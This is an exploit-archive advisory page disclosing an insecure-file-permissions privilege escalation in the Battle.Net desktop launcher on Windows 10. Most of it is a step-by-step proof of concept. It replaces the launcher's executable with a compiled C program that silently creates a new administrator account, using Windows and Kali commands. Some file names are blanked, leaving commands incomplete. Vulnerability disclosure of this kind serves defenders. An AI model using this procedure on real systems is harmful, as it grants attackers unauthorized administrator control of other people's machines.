Battle.Net Insecure File Permissions

Risk: High
Local: Yes
Remote: No

# Exploit Title: Battle.Net - Insecure File Permissions # Date: 2020-10-09 # Exploit Author: George Tsimpidas # Software Link : ( Battle Net Desktop ) # Version Patch: # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 # Category: local Vulnerability Description: Battle.Net Launcher ( suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Users' group, making the entire directory '' and its files and sub-dirs world-writable. ## Insecure Folder Permission C:\Program Files (x86)>icacls BUILTIN\Users:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) CREATOR OWNER:(OI)(CI)(F) ## Insecure File Permission C:\Program Files (x86)\>icacls "" BUILTIN\Users:(I)(F) BUILTIN\Administrators:(I)(F) FREY-OMEN\30698:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name C:\Program Files (x86)\> whoami lowpriv C:\Program Files (x86)\> move Battle.frey.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user placebo mypassword /add"); system("net localgroup Administrators placebo /add"); WinExec("C:\\Program Files (x86)\\\\Battle.frey.exe>",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o #4. Transfer created '' to the Windows Host #5. Move the created '' binary to the 'C:\Program Files (x86)\>' Folder C:\Program Files (x86)\> move C:\Users\lowpriv\Downloads\ . #6. Check that exploit admin user doesn't exists C:\Program Files (x86)\> net user placebo The user name could not be found #6. Reboot the Computer C:\Program Files (x86)\> shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top